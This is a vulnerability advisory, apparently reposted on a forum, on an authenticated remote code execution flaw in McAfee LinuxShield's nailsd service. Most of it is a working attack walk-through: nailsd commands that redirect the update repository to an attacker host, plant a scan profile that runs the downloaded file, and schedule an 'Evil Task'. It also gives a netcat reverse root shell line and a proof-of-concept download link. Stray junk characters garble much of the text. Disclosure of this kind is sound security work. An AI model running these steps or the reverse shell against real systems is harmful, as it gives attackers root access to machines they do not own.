    * S. L! a2 t6 n/ ^(Product description from LinuxShield Product Guide)4 b" F2 h  `- \
      n" x" R: O6 Y
    7 z. D7 \* ^# U4 q6 V# N

    9 @9 a# _7 Y2 O7 a- l( H" B. c# fDescription:* o: t9 T6 L9 s: M' x' I
    ============
    # v# R  v3 Q2 S* N# P& I! o, U/ u  l. }+ a9 u# A
    This vulnerability allows remote attackers to execute arbitrary code6 L' G8 d$ f+ o# F- I7 a1 K
    on vulnerable installations of McAfee LinuxShield. User interaction9 d4 x5 K4 @- c2 [, w
    is not required to exploit this vulnerability but an attacker must2 q# E- g4 D2 c5 m) r8 |
    be authenticated.# w2 y+ w" `& D1 B$ v( e
    # f7 K; w$ y$ r5 s/ C
    The LinuxShield Webinterface communicates with the localy installed
      U$ n9 q& g% u# k5 Y"nailsd" daemon, which listens on port 65443/tcp, to do
    & [: I. u4 B7 x7 `0 O0 \# [( P( sconfiguration
    : J) b  c8 |; U% Q4 }' a0 Mchanges, query the configuration and execute tasks.
    9 I4 m- @" `& G3 q
    / h! D, V: {) |3 b$ t' C2 P6 ^Each user, which can login to the victim box, can also authenticate
    ' W: }* Z6 d1 U$ Cit self to the "nailsd" and can do configuration changes and/ X7 c/ K/ C# B0 r
    execute- X# u+ b9 G" U, V( x% C
    tasks with root privileges.
    ) L! ?! h0 N9 D; [+ @. X- {, N+ l- R2 s  u  `' D! h2 }
    A direct execution of commands is not possible, but it is possible to
    : F' T6 C. H4 m4 y+ ~# M6 Rdownload and execute code through manipulation of the config and2 F  L# x8 [, P" v- }( L/ h
    execute schedule tasks of the LinuxShield.8 F+ g# `9 m' E$ t

    9 p# ^$ a/ o- u0 e/ l9 F
    8 c+ U' n- i3 z1 d% wwalk-through (after the TLS handshake):- p- J6 `, [8 L5 F
    +--------------------------------------
    8 f: H; D: z6 |4 j4 T8 r
    + B: r* r$ ^! R' d( c$ Mnailsd > +OK welcome to the NAILS Statistics Service8 D4 A0 c' B. T3 _0 Z/ O; i# `! Q6 \
    attacker> auth <user> <pass>) S8 b2 B$ C1 j$ _# v
    nailsd > +OK successful authentication
    5 ~2 b0 p6 y0 t7 {$ w8 x; p# A' R8 e+ r9 I0 Z; O
    # Set the Attacker repository to download our code from a httpd
    1 W& F1 ^- U, B. u/ H: s7 P! |2 C# (catalog.z)" x7 D, b$ U. }7 m) X2 {7 v* t  N# g+ l
    #---------------------------------------------------------------
    ) `# ^/ h  ?% A/ f9 B! jattacker> db set 1 _table=repository status=1 siteList=<?xml version
    8 ^: W/ Z. j0 E8 f% y3 ~8 w; h1 U="1.0" encoding="UTF-8"?><ns:SiteLists
    " v9 c3 p! u! ]1 H! M: v. E6 C7 yxmlns:ns="naSiteLi8 `, Q- q8 b2 @2 c1 E
    st" GlobalVersion="20030131003110"
    # v! Z* V3 s0 z, \! t- R$ O, ILocalVersion="20091209/ T* R" X. h( f
    161903" Type="Client"><SiteList$ E9 H( {; o6 i( e- q2 s( E+ c# V
    Default="1" Name="SomeGU) z1 g* E( y% t/ A: F5 l& k
    ID"><HttpSite Type="repository"3 C8 {7 x' b; V3 J/ ]6 v1 H# C
    Name="EvilRepo" Order="1
    5 g! L. g/ C0 n/ {  O5 Y, v" q3 P" Server="<attackerhost>:80"
    ; ^+ A$ X6 E. G7 y& D/ sEnabled="1" Local="1"><Rela9 w: J6 O3 N  D2 R
    ' A( d- q- d' a  `5 \1 B6 @
    tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use. N- X8 d8 @* M2 F9 J
    rName></
    - N! U/ g, M8 j2 g0 b6 m) GUserName><Password! c; V* h6 s) d, \1 V+ _
    Encrypted="0"/></HttpSite></SiteList></# u# n7 T0 O. X  }! |& \: h
    ns:SiteLists> _cmd=update5 I: s$ e/ N; T! h. Q1 y+ t7 r
    nailsd > +OK database changes buffered.+ j9 Z3 |6 B8 z+ F- }

    / j0 a9 N+ z1 H6 g  K+ B( x# Execute task to set the attacker repository
    7 p; ]* F2 ]) b# q#---------------------------------------------------------------: t9 q5 }% t2 B6 v% [0 D( j
    attacker> task setsitelist- z. A- v/ E& v4 g+ o- E
    nailsd > +OK setting sitelist from CMA.0 Q2 S; T- _/ g2 I
    # [1 i- |" E6 m+ j; d' B8 `* F' ?
    # Execute the default Update task to download the code8 @7 G2 L* C# w
    #---------------------------------------------------------------; W  L- ?' `9 ~
    attacker> task nstart LinuxShield Update
    " M" R7 l/ d$ Fnailsd > +OK task LinuxShield Update starting1 n" {- u: |, r! l
    0 h, y: J7 a) X  `* p) k
    # Create a Scan profile, which executes our code. The profiles are4 f4 Q2 M- N9 o8 M& M, X% [# f$ O
    # not stored in the database.3 \. P, B8 D% j' s0 ?$ [) C
    # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg% N6 D; P; A) L) x! }' A% j( G
    #---------------------------------------------------------------+ y, H: u5 ^: D2 ]( e, N" Z
    attacker> sconf ODS_99 begin, r$ a8 D  M- v( R' X
    nailsd > +OK 12604008883 ~& {' f+ k( Z) e
    * q2 Q, Z3 X2 C7 p1 H* g
    # Set the variable "nailsd.profile.ODS_99.scannerPath" to the% b  s- M: ?* k; j9 ?) E3 |. m
    path
    : g* \0 v* t/ m3 W# where our earlier downloaded catalog.z file is stored.+ R) a0 q5 s+ v! t
    # (/opt/McAfee/cma/scratch/update/catalog.z)5 x/ ]3 }' z( t. h" n
    #---------------------------------------------------------------
    # |8 p! y! _' y5 T; Y% Fattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
    6 Z  |0 n. i; H1 ?true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
    ; y. X! o+ O4 i( W* m. vDS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=9 P$ `5 k  C& a- {) e
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    * U: U! w8 `4 D; `: U6 {2 cine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro% h# c+ v5 L$ ^# W* h6 z- ?
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
      C% t2 c* y! V# ^+ Oir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en1 @$ V, v9 K0 |7 B# t( f0 j
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
    " M3 U* d- z% t9 b; ^.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu( u- Y4 W, ~4 w5 H
    risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru5 V% g* Z) v! o& E9 V  _1 F
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99) L7 G/ Z' p1 u6 n" B: U: }
    .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi+ w7 R/ S. s% y: G8 f% Q
    le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    4 t( g0 W$ A$ R; N8 ?dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    : f: d8 ?3 V( W6 U% {$ W+ Q0 se nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    6 y( e- P  \$ y1 i" m- uofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm1 ]6 V  @: c: y2 n( ^
    o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    1 Z7 @3 A6 f) @* F0 P% o4 s8 N.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t/ n0 _# G7 Z: U: ~; X
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    . c0 n5 x/ L  n# mch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    " k8 s& b# P. g00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.4 y6 h* M! j/ T) G3 R
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
      X7 }3 v) k" P, \, Z0 zter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
    + x4 P, `1 V2 A/ g) j" anailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
    5 C* d% A4 t9 _& g* E) g' k# yofile.ODS_99.filter.extensions.type=extension nailsd.profil
    $ Z9 V$ `5 ?3 M: b" ie.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_991 ?1 ]3 t' a! E: U8 V
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    6 K$ H' a  i4 qaction.App.primary=Clean nailsd.profile.ODS_99.action.App.s4 j) W( M3 v5 Z, {( L" @7 w  u- t
    econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
    5 f6 d& o- k9 G. K  [ss nailsd.profile.ODS_99.action.error=Block6 V+ U+ s- O, P; E
    nailsd > +OK configuration changes buffered- H& S6 T5 ]4 |5 B* g) A# e; ~
    attacker> sconf ODS_99 commit 1260400888
    3 i/ l6 w' u" V4 }% ^4 Ynailsd > +OK configuration changes stored( Q# U: I$ E+ z- i% x2 O& g3 j
    ; q+ X, K1 m" r
    # Set a scan task with the manipulated profile to execute the code
      f' s4 s/ |& J# N. }' D#---------------------------------------------------------------: y8 C. r8 w" Q3 ~, t9 H) x1 o5 {
    attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy+ s0 H) y8 d' x- I; ^7 u
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    9 u+ B0 J/ D9 Bmp;exclude:false timetable=type=unscheduled taskResults=0 i
    4 T5 `' S2 T, k! O: B4 S  H_lastRun=1260318482 status=Stopped _cmd=insert: z  Y/ m- ~4 _; j% W; x
    nailsd > +OK database changes buffered
    6 o  X; B4 e: Q9 `! Z# b+ c7 q3 q  r$ N9 q3 v) b7 ]
    # Execute scan task to execute the code
    & ~. w# w% A' @- U# ?& L9 I3 m% q#---------------------------------------------------------------* z3 @3 j0 E% C  n# J4 x0 E6 l
    attacker> task nstart Evil Task0 F3 W! f  f# X3 r' s" [) u

    $ H$ Z( X9 ?/ z0 i+-------------------------------------- walk-through EOF2 Y, h/ M9 a. }% m1 g

    + }5 ?% c! a! E- g$ b. u. f2 h! g  c0 ]7 d+ y) r/ ~
    To get a reverse root shell place something like this in the catalog.z
      `4 P1 S/ W/ b9 i+ P
    5 y6 }- n; a+ O5 }' W8 N--- snip ---
    , i$ G4 J8 e) s) X#!/bin/sh, Z( B! s: z# q6 ?0 x
    nc -nv <attacker_host> 4444 -e /bin/sh+ _9 `9 S4 d6 ?' t/ @
    --- /snip ---/ ?" V6 s0 A, b1 s7 R8 j. b
    / _/ B- J+ c1 h* X+ \6 p# z! f

    0 S) E% ?% m2 R2 a  F% Q
    % U  M  W6 [# g! u# [2 l  p" W; L$ LProof of Concept :
      O- S" c8 f+ s2 a==================0 L8 F: }5 {% Z( \- v8 F2 Q
    + B' z# O+ n1 A2 R( j: l3 K9 ?
    http://inj3ct0r.com/sploits/11165.tar.gz
    / l3 M9 W( S7 X8 R$ S
    # m4 F+ i! \- J5 }/ A! \3 o  f2 ?: ~& n+ n) O* c) p3 u" a
    ) N* E& P. Y9 |' m8 `
    Solution:
    $ q, A  Y5 u9 V5 _7 q3 h6 t) k=========
    9 [9 g2 _  q3 w* c
    2 p$ A. m. H* H$ N" f8 w9 wMcAfee Advisory
    5 w' d! i' m3 E8 \3 g+--------------, r3 l* _4 A, L( R8 f' ^" ?: y4 ?
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    ' n* |& ^2 N# _: p8 D7 \
    5 h/ @2 _. i4 [$ j; _: c
    & k7 M6 _' t. b2 _$ @1 S
    / w) b' m, e2 @0 r& _( F. [Disclosure Timeline (YYYY/MM/DD):
    0 y- e- E) f" J* d- q# A+ g" x=================================. ]$ A& m' E$ c  w: c

    2 U: s$ s4 C& Z. q2009.12.07: Vulnerability found
    9 S4 _) G# ]: a; i2 v; }* C0 V2010.02.03: Asked vendor for a PGP key
    * G4 o8 w$ X6 T4 l: A8 j2010.02.05: Vendor sent his PGP key  t2 y, u: ?- ~5 c5 M7 d" H# l
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure3 s4 Q6 ?" x  p* `3 u; M% }: g
    date (2010.02.18) to Vendor
    ( s: j' b) M6 U1 g2010.02.05: Vendor acknowledges the reception of the advisory# g( m# ?2 h7 |) c
    2010.02.16: Ask for a status update, because the planned release date is7 U1 d2 C& \8 p- {! ~$ d
    2010.02.18.
    ! O, i/ ?" x$ D3 V7 N2 a0 ]2010.02.16: Vendor response that, they are currently working on a patch
    9 v! w! Z$ k2 c2010.02.17: Changed release date to 2010.02.25.
    : j' w6 c" H2 v: u6 [& k0 e" m- }2010.02.22: Vendor gives a status update, that they are able to release
    3 D$ p# |5 x; H+ k" rthe patch on 2010.02.25.
    & z/ r" t- a: A3 P4 K7 X3 {2010.02.24: Ask for a list of affected products and the advisory url.
    " c$ i/ i) o1 j) k- v& L2010.02.24: Vendor sends the list.
    / u+ U+ f0 x" N. _2010.03.02: Release of this Advisory8 ?* e' x$ q* j2 Y, A/ J5 C- n

    % l7 r3 _; z8 m- o. n$ y5 Z' c8 }  d1 V4 E, ^& [4 ^

    ; @! _1 O. t/ w% z3 o! ^
    & W- V$ ^- ?9 U! _& h9 [
    1 ]. w4 t* \9 G$ W; F' u5 C9 U
    ' B+ S0 k& e1 L# \: r' X# I4 b5 W2 i9 k

    - H: B$ u% _! c) R1 _
    # M1 S7 {* P. i! T7 R: F+ S8 J" y/ A2 p# K; O
    * c/ P+ o8 d7 B1 T
    $ O- T/ j3 j6 O- p! J7 {

    " `9 {9 r, `6 c- w. a/ a0 ^4 X1 H6 ^/ e3 g+ [9 A3 Q& a* f1 \

    + E. H. y2 o3 Z3 r" h0 u- O4 \, H
    ) P+ O% E% D/ {& ]4 ?6 w8 e  P* R5 h$ l8 p

      e, h- l+ ~0 I  |+ V/ T, F* Z, n- {2 x5 m
    6 U% e8 a0 W* i( D0 E  \& G9 O
    $ Y# L, _- {6 l4 F( E+ s
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表